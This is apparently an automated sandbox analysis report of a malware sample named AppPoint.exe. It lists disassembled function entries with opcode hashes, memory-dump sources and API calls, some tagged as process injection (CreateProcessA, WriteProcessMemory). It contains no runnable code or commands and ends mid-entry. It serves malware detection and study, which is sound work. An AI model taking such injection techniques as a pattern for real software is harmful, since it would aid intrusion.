Opcode ID: 0dc1099294881ef95316d4d16526e5937264aba6072fcc2343b0a051725a194f
Instruction ID: f0e9facdffc9169622713f1cf53bab37c7f231fc007a71bc1f5528675b7693d1
Opcode Fuzzy Hash: 0dc1099294881ef95316d4d16526e5937264aba6072fcc2343b0a051725a194f
Instruction Fuzzy Hash: C421CFB5D012199FCB00CF9AD985ADEFBF4FF48310F10812AE918A7240D3786954CFA5

Function 06523F18 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 719ff892a861174c5006f78724702dbda37fed043a9edd6ff41bf21ba7b09157
Instruction ID: c67a6ec9656bfa4a499b9075f070abe3d8280baeeff235584ee11ba473fa74f4
Opcode Fuzzy Hash: 719ff892a861174c5006f78724702dbda37fed043a9edd6ff41bf21ba7b09157
Instruction Fuzzy Hash: 6B11C2B1D012199FCB00DF9AD884ADEFBB4FB49310F10812AE918A7240D3786954CFA5

Function 00E9FE88 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70bf1aa0bbc0f4a312a111322b679b0528b68f61bd4e6dffe9cd825a35066d56
Instruction ID: a62d70e0a2de69e00a14cfdf6da882fed0baa4e37619df0d824640d9ac2067d4
Opcode Fuzzy Hash: 70bf1aa0bbc0f4a312a111322b679b0528b68f61bd4e6dffe9cd825a35066d56
Instruction Fuzzy Hash: 371123B6900209CFCB10CF99D444ADEBBF1FB49310F10852AE929A7310C379A945CFA0

Function 06524500 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2624a0927204f4ca3eeefffea9f298b87785aa839b41b2e298c531694a674f34
Instruction ID: 71ca7c454f0220ea6dbf30ffa234acd64d64290493802b762d2ab522f80aa8aa
Opcode Fuzzy Hash: 2624a0927204f4ca3eeefffea9f298b87785aa839b41b2e298c531694a674f34
Instruction Fuzzy Hash: F3016231B100210BDB559A6DD45472FA7DBEBCAB15F108839F10EC7394DD65DC064795

Function 0652ABF0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca08c089abe755f1b2b5697edd851cb52986386f179f56ae8e628c148c8a13a
Instruction ID: 5cbdd5b6d893322e084be03883e10fc9da143fa71b4517d5968612c2e9720e5b
Opcode Fuzzy Hash: 2ca08c089abe755f1b2b5697edd851cb52986386f179f56ae8e628c148c8a13a
Instruction Fuzzy Hash: DE01A231B000260BDF55A67DD81572F67EAEBCAA90F108879F10AD73C8EE25DC024785

Function 00E9F338 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7360e2bb3d692fd8d232c194a105ddb37fe8d52d7f84931d809de107b4a270b
Instruction ID: f2500b0b15c0c89174a4f76de501c6833d469ce3e664a630fdfa7e8b65684e85
Opcode Fuzzy Hash: f7360e2bb3d692fd8d232c194a105ddb37fe8d52d7f84931d809de107b4a270b
Instruction Fuzzy Hash: 32018135B000115BDF25D57DE464B2E67DADBC9728F10843AE10AD7344DE2ADD0347C1

Function 00E98560 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bf5b72a1c232af4b9ee4cb5ed362e483e2a0f4a1bb172ad22b567664150c825
Instruction ID: 0225b662ebdfcc23e9d4b5e5575682ed3a9111077875e3ac74a875d5eb3fa376
Opcode Fuzzy Hash: 6bf5b72a1c232af4b9ee4cb5ed362e483e2a0f4a1bb172ad22b567664150c825
Instruction Fuzzy Hash: 15116939B000188FCB04EB78C158A6D77F2EF8825AB1548A8E00ADB3A5CF30DD46CB42

Function 0652D380 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38a05508555dfa0045d20c5028ea4ee22efff1ce8e857ceca1c97e3d856c376c
Instruction ID: 8358d53c040663cd8f31fcde1d4a2b89b43dbf7ff7423242b3f5e5119cab43f6
Opcode Fuzzy Hash: 38a05508555dfa0045d20c5028ea4ee22efff1ce8e857ceca1c97e3d856c376c
Instruction Fuzzy Hash: 6E01D632F101395BDF18AA65E8016AEB7B6FB85350F004539E901EB384DB72AC058BC0

Function 00E9FDB8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e9cbb99ae21ce868e1447d115e68918b25aed57ee1b3e691e66e808a906899d
Instruction ID: 3bc1c56a6c3be86209f890f42f6d6cd5a6cf72acca5b84c9c383370eb77e58f9
Opcode Fuzzy Hash: 2e9cbb99ae21ce868e1447d115e68918b25aed57ee1b3e691e66e808a906899d
Instruction Fuzzy Hash: 68F0A476A042047F9B45DBAADC01CAB7BFEEFC6320704C1A6F515DB221DA3099118BA0

Function 00E90818 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11bbd87fa2b5570756afcba4b697f0f4e021f73c8ceb6e74395e9d7052c9fa96
Instruction ID: 0d745bdd208672713671c2cecacc907e80dc887ecc1837216b1bb9cd0acfb976
Opcode Fuzzy Hash: 11bbd87fa2b5570756afcba4b697f0f4e021f73c8ceb6e74395e9d7052c9fa96
Instruction Fuzzy Hash: 1EF0C820A493D10FEF32577C98747A97F68DF03318F4804E3D884DA193D448C889C395

Function 00E9976F Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf0d9ca41764f8a1abb49719fd85c2af48c15e3d92e25c0dcbf8bd51a6afe6d6
Instruction ID: 24052adc327ac76089e00216ebdd289a01ef050b46c8d426cb6f67f3cde57b9b
Opcode Fuzzy Hash: bf0d9ca41764f8a1abb49719fd85c2af48c15e3d92e25c0dcbf8bd51a6afe6d6
Instruction Fuzzy Hash: 3F01D230A182899FCB0AEBB4F99094D3FF5EF82200F0009E9C0558F1A6CF34590AD782

Function 00E99780 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a1c844cc24f7c8dc1a5992307f3acf95840d47d53ebbbb29f17cc0fd79e5cac
Instruction ID: 2108eadb51d8074d6a23a40a4b18012c3bef8aaee48ec8970fc4e53694bc398b
Opcode Fuzzy Hash: 7a1c844cc24f7c8dc1a5992307f3acf95840d47d53ebbbb29f17cc0fd79e5cac
Instruction Fuzzy Hash: 3EF06D30A10209AFCB05FFB4F995A9D7BFAFF40344F5045B9C0099B298EE345A099781

Function 065267E9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 261a26f3836bd973b454f9b22f7f360964e93ce68b36d56a94bf4f02a50137bf
Instruction ID: 1e247a8e41ad895718328319806f7c6cd5d2bfce394dc97871ece93503bacb3d
Opcode Fuzzy Hash: 261a26f3836bd973b454f9b22f7f360964e93ce68b36d56a94bf4f02a50137bf
Instruction Fuzzy Hash: EEE0D830E052566FDB50CFB08A057AA3BE4FB43304F2089E6D458CB191E136CE028B50

Function 00E91734 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b2e8e4730b74e80eef6673c6fc7a70117d8e16b8e851ede672c7605ccc694f
Instruction ID: 6aba3bbbe78459405e393535ae82ea4ed7baf62fc164806003ae845212d0970b
Opcode Fuzzy Hash: c8b2e8e4730b74e80eef6673c6fc7a70117d8e16b8e851ede672c7605ccc694f
Instruction Fuzzy Hash: 5FF09B59E051D346EF3106E895543702F54C737399F4824D7D48AEB2A6E68DC891D703

Function 00E9FF38 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2e22916a911590a7a7990b3b1063a51fe32a4080a7d62e91d6ece8f37ddb402
Instruction ID: 209791b8529a19e8bcc872dabd1f0bec20dbc15e8f3592c3089f1fc371afe84a
Opcode Fuzzy Hash: d2e22916a911590a7a7990b3b1063a51fe32a4080a7d62e91d6ece8f37ddb402
Instruction Fuzzy Hash: B6F0A07190E244EFC701FFA4DA108DD7BBAEB03210B204296E8049B2A6E7361F08DB51

Function 00E90848 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18505d1101db54966b7871a080379143985abf73afb689d315ce2b013a2f27de
Instruction ID: 620e9f6b13d96974c311be092969e50aeab97a01c7b7252bfc41a1f78266fe24
Opcode Fuzzy Hash: 18505d1101db54966b7871a080379143985abf73afb689d315ce2b013a2f27de
Instruction Fuzzy Hash: 17E01234B402050FFF3811A8944577D724CD751328F905C35ED1AE62C1D955DC9145D6

Function 065267F8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f311f66a50621a0b38a285a871a6ff67c4d21a25833c0f292028de218d08a3ec
Instruction ID: 3ecf8ec3fc51a845a2b923a1f6d209c4c3f0072081ba9be8b1f2ab0b0e8ec8e2
Opcode Fuzzy Hash: f311f66a50621a0b38a285a871a6ff67c4d21a25833c0f292028de218d08a3ec
Instruction Fuzzy Hash: 6BE01271E1421AABDF50DEB4C94575E77EDF743214F2088A5D408DB281E676DA018B90

Function 00E9FF48 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40edd0dcfc135800283c58b0b63eb19a4eb478c7146c55b4e1e4f3519c6e982d
Instruction ID: 34bfa963aa661da1420900b8b3f20de95d54dd725c6f3cdf31ac0f47e76231d9
Opcode Fuzzy Hash: 40edd0dcfc135800283c58b0b63eb19a4eb478c7146c55b4e1e4f3519c6e982d
Instruction Fuzzy Hash: 12E08674909109EFCB00FFE4E50585CBBF9EB45704B1086A5E80497394DB367F04DB51

Function 00E99728 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b074d2f8e146371fb5332a660544b047b5d5467f6d2bdb8ac77701efe16248ca
Instruction ID: 792be9badb51dc749ac369ca301926053abe6e195151baaf6d89d01666441fa3
Opcode Fuzzy Hash: b074d2f8e146371fb5332a660544b047b5d5467f6d2bdb8ac77701efe16248ca
Instruction Fuzzy Hash: 45E072316083C10BEF22A96CA14A7083E64D702338F1806ABE829CA2C3E2088DA1C303

Function 00E99738 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5ba4dd93927aeefcbd28e73f65c6992b841bc94716c2e9acf9f5654363926f
Instruction ID: ca4ec121b2dd29b28fdaa082e490ea7c9e93b4e85c1dae87ca07e74ff6a2ffdc
Opcode Fuzzy Hash: 6e5ba4dd93927aeefcbd28e73f65c6992b841bc94716c2e9acf9f5654363926f
Instruction Fuzzy Hash: 80D0C93463430547EF212AFDA65A32D378DE756328F10282BF80AE6642EE19DD918553

Non-executed Functions

Function 0652B2D0 Relevance: 10.3, Strings: 8, Instructions: 251COMMON

Download Yara Rule

Strings

$]q, xrefs: 0652B3DE
$]q, xrefs: 0652B464
$]q, xrefs: 0652B4A0
$]q, xrefs: 0652B43F
$]q, xrefs: 0652B470
$]q, xrefs: 0652B4AC
$]q, xrefs: 0652B3D2
$]q, xrefs: 0652B433

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1273862796
Opcode ID: 7766d1f12c01bf79cf924d10906a9442a0c6ddc7adc2b5c89b8fc9ab9964dd79
Instruction ID: 32dede1188001631279a426a526695bb677fd2dec8addc52f8d416f9111eefc9
Opcode Fuzzy Hash: 7766d1f12c01bf79cf924d10906a9442a0c6ddc7adc2b5c89b8fc9ab9964dd79
Instruction Fuzzy Hash: 5B91AC30E0021A9FDB68EF69C595BAE77F6FF85748F108429E402AB2D5DF349841CB91

Function 065274C0 Relevance: 9.2, Strings: 7, Instructions: 437COMMON

Download Yara Rule

Strings

$]q, xrefs: 065277CA
$]q, xrefs: 06527A03
$]q, xrefs: 065277D6
$]q, xrefs: 06527987
.5uq, xrefs: 06527512
$]q, xrefs: 06527746
$]q, xrefs: 065279F7

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-981061697
Opcode ID: fc3e81984000861121c298b54ce4fc803f4ccc4d27b23986f2105b56798ce8ba
Instruction ID: 465a5523d3663274b65dffac0f0b5120656039699c21df930fa6ecc3c4b83ace
Opcode Fuzzy Hash: fc3e81984000861121c298b54ce4fc803f4ccc4d27b23986f2105b56798ce8ba
Instruction Fuzzy Hash: E1F16C30B0021A8FDB58EFB5C455A6EB7F6BF89740F208469D40AAB395DB34DD42CB81

Function 06528990 Relevance: 5.3, Strings: 4, Instructions: 300COMMON

Download Yara Rule

Strings

$]q, xrefs: 06528C16
$]q, xrefs: 06528C81
$]q, xrefs: 06528C8D
$]q, xrefs: 06528C22

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 2d0c16a00d06120721705de20069820c25b92b20aec349789a954a63fe2af585
Instruction ID: 95d9f90c0da855dbc2709dd4c1c9d5fbe9c559e6b6fb5d3e52de85d69d38e02b
Opcode Fuzzy Hash: 2d0c16a00d06120721705de20069820c25b92b20aec349789a954a63fe2af585
Instruction Fuzzy Hash: 1DB16F30A002198FDB58EFA9C4516AEB7F2FF85740F248869D406EB395DB34DC4ACB81

Function 06528DE0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

LR]q, xrefs: 06528EE6
$]q, xrefs: 06528E6F
$]q, xrefs: 06528E7B
LR]q, xrefs: 06528F4C

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$$]q$$]q
API String ID: 0-3527005858
Opcode ID: c91128716396f4001a4fcc930686b277255df46ba3b86c3e225a00c21bdfbe40
Instruction ID: b3e340cb7c67226f59dbc9612745a05b64f7f8f804c53f10aa45422313371be0
Opcode Fuzzy Hash: c91128716396f4001a4fcc930686b277255df46ba3b86c3e225a00c21bdfbe40
Instruction Fuzzy Hash: 6561D330B001169FDB58EB78D851A6EB7F6FF85780F1485A9E406AB395DE30EC05CB91

Function 0652B698 Relevance: 5.2, Strings: 4, Instructions: 184COMMON

Download Yara Rule

Strings

$]q, xrefs: 0652B7D9
$]q, xrefs: 0652B832
$]q, xrefs: 0652B896
$]q, xrefs: 0652B867

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 19c93138e6d7ec91a765e6093e6c92459f71f4c2bc717a81a1de3911e6de366b
Instruction ID: f23c62ec2118d1de2d7bcfe957e7ccf1077fa1815c6249a56ae57d0d678023bc
Opcode Fuzzy Hash: 19c93138e6d7ec91a765e6093e6c92459f71f4c2bc717a81a1de3911e6de366b
Instruction Fuzzy Hash: 0251AD30E102169FCF68DB64D581AAEB3F2FF86344F14492AE40AEB295DE31EC41CB51

Analysis Process: AppPoint.exePID: 7668, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	14.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	243
Total number of Limit Nodes:	16

Executed Functions

Function 056A3F6A Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056A41A6

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0c7b9bf3ba2ad421710fc3e7480e2be4f0955676ff9b6ad48607f1f91087c7b8
Instruction ID: 250ed1f8f326bbf2cd367459fc488020d9f6abafec823d309f94b3225aa6f24b
Opcode Fuzzy Hash: 0c7b9bf3ba2ad421710fc3e7480e2be4f0955676ff9b6ad48607f1f91087c7b8
Instruction Fuzzy Hash: 83913872D006199FEF24CFA8CC41BADBBB2BF48311F1481A9D819A7240DBB59985CF91

Function 056A3F70 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056A41A6

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 327228b00679189c48c595cf7ff48450d4cd3fd98cc8c1ec98b6585fe9da9cb8
Instruction ID: 0ea636232447cb0a20b18d1cd667f185fc91797b63fb0db674e8f578c965b205
Opcode Fuzzy Hash: 327228b00679189c48c595cf7ff48450d4cd3fd98cc8c1ec98b6585fe9da9cb8
Instruction Fuzzy Hash: 41913972D00219DFEF24CFA8CC41BADBBB2BF48311F1481A9D819A7240DBB59985CF91

Function 01518CF5 Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01518DB1

Memory Dump Source

Source File: 0000000B.00000002.2348799219.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1510000_AppPoint.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 32215d452090dcf43337d27518f36f58280410cc865bcf0a7712da7792e41027
Instruction ID: 64d1d805d03614c8f3ebfa25278d4264cf0eb934360e3598a15aa3288208b886
Opcode Fuzzy Hash: 32215d452090dcf43337d27518f36f58280410cc865bcf0a7712da7792e41027
Instruction Fuzzy Hash: 4841EDB0C00719CEDB25CFA9C944BCDBBF6BF88704F20806AD418AB254DB756986CF91

Function 01517804 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01518DB1

Memory Dump Source

Source File: 0000000B.00000002.2348799219.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1510000_AppPoint.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2c224921a5005377f1d4fd055c1088f7890dea902e29a3491ab78d9729897ef8
Instruction ID: ac709b75cc2bb5570fb460b9d1c594d4a80cb2903bc38653e8eb27212b232bf6
Opcode Fuzzy Hash: 2c224921a5005377f1d4fd055c1088f7890dea902e29a3491ab78d9729897ef8
Instruction Fuzzy Hash: 4F41ECB0C00719CBEB25CFA9C944BDDBBF6BF88304F20806AD408AB254DB756946CF91

Function 097FCA90 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2354456728.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_97f0000_AppPoint.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 6a3e3982380cd7f31363c0e9de14376319e1dde0f712ab52f423445ad4b4861c
Instruction ID: 9790802159ab476316abcc55e323182535f3e648b01733563171028087ab62c6
Opcode Fuzzy Hash: 6a3e3982380cd7f31363c0e9de14376319e1dde0f712ab52f423445ad4b4861c
Instruction Fuzzy Hash: 4F316B729043489FCB12DFA9D804AEEBFF8EF49310F14845AE654A7221C335D954DFA1

Function 097FBD90 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,097FBD7D,?,?), ref: 097FBE2F

Memory Dump Source

Source File: 0000000B.00000002.2354456728.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_97f0000_AppPoint.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: d24fb18690487e576ca21e4067f5e4898cd9c7cef20debcd19460a6fb7e00a37
Instruction ID: 0075be8712e88341bf27758643a276b2e14f391e83f99e31c51e5a690a808f1e
Opcode Fuzzy Hash: d24fb18690487e576ca21e4067f5e4898cd9c7cef20debcd19460a6fb7e00a37
Instruction Fuzzy Hash: 2E31BFB69013499FDB10CF9AD884A9EFBF5FB48320F14842EE919A7310D775A944CFA1

Function 097FACD4 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,097FBD7D,?,?), ref: 097FBE2F

Memory Dump Source

Source File: 0000000B.00000002.2354456728.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_97f0000_AppPoint.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 1294e0160338b2f84589bbe428c3005bad6971441dbc999a16cd5621ac0254e9
Instruction ID: 3f3794a1226e097fd384b0be72aa2f8c5208a2c790f3c18fe03af1954787b7dd
Opcode Fuzzy Hash: 1294e0160338b2f84589bbe428c3005bad6971441dbc999a16cd5621ac0254e9
Instruction Fuzzy Hash: BE31E0B69003099FDB10CF9AD884AAEFBF5FB48310F14842AE919A7310D374A944CFA1

Function 056A3CE0 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 056A3D78

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 848663873053c235f87178d237996a1360c3e450f0c04c5dfa2ca704e078349d
Instruction ID: 8f55cb1e3ca555f29acc2480fc27b245afba8b86b211455cb9c4bcd82928f7cd
Opcode Fuzzy Hash: 848663873053c235f87178d237996a1360c3e450f0c04c5dfa2ca704e078349d
Instruction Fuzzy Hash: 242126B69002499FCB10DFA9C9857EEBBF5FF48310F10882AE519A7340C7789944CFA0

Function 056A3CE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 056A3D78

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6933e9e299b6281206577b292fca5f7747788dad2064d06d9ed9028ad2fbc783
Instruction ID: d3be84a7d2f8b08ae67c74db15bd7b0df9c2f5b43ea3fbd3628ba463732ad06c
Opcode Fuzzy Hash: 6933e9e299b6281206577b292fca5f7747788dad2064d06d9ed9028ad2fbc783
Instruction Fuzzy Hash: 5221E4B59002499FCB10DFAAC985BEEBBF5FF48310F108429E919A7350D778A954CBA1

Function 056A3DD0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056A3E58

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
